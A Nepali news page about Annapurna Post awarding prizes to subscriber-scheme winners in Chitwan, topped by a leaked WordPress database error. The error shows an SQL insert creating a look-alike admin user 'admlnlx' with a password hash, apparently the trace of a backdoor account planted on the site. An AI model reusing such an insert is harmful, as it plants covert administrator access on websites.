WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6xLH5kldA45dfNp0CVwIcei9swf8V0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:21:01', '', 'admlnlx', 'admlnlx')
चितवन, माघ २८
अन्नपूर्ण पोष्ट राष्ट्रिय दैनिककको ग्राहक योजनामा विजेता बनेका भाग्यशाली ग्राहकलाई पुरस्कार वितरण गरिएको छ । पत्रिकाको ग्राहक बनेकाहरु मध्येबाट स्क्र्रयाच कार्ड विजेता भरतपुर ७की आकृति भट्टलाई फ्रिज र साप्ताहीक लक्की ड्र विजेता भएका भरतपुर २१ कीदुर्गा थपलियालाई ८० हजार बराबरको घरायसी सामान प्रदान गरिएको छ ।
अन्नपूर्ण मिडिया नेटवर्कको कार्यालय भरतपुर ११ वाईपास रोड अन्नपूर्ण मार्गमा एक कार्यक्रमको आयोजना गरि जिल्ला प्रहरी कार्यालय चितवनका प्रमुख प्रहरी उपरिक्षक दिपक थापाले हस्तान्रण गर्नुभएको हो । सो अवसरमा प्रमुख अतिथि थापाले समाजको रुपान्तरणका लागि संचार माध्यमको प्रभावकारी भूमिका रहेको भन्दै प्रसंसा गर्नुभयो । अन्नपूर्ण मिडिया नेटवर्कद्धारा संचालित अन्नपूर्ण पोष्टको वार्षिक ग्राहकबने बापत पुरस्कार योजना अन्नपूर्ण मिडिया नेटवर्कले जनाएको छ ।
एपीवान टेलिभिजनका ब्यूरो प्रमुख अनिल ढकालको अध्यक्षतामा भएको कार्यक्रममा अन्नपूर्ण पोष्टका चितवन वितरण प्रमुख युधिरराज घिमिरे , आदर्श मिडिया हाउसका संचालक कृष्ण भण्डारी , पत्रिकाका कर्मचारीहरु महेश अधिकारी , सृजना ढकाल लगाएतले बोलेका थिए ।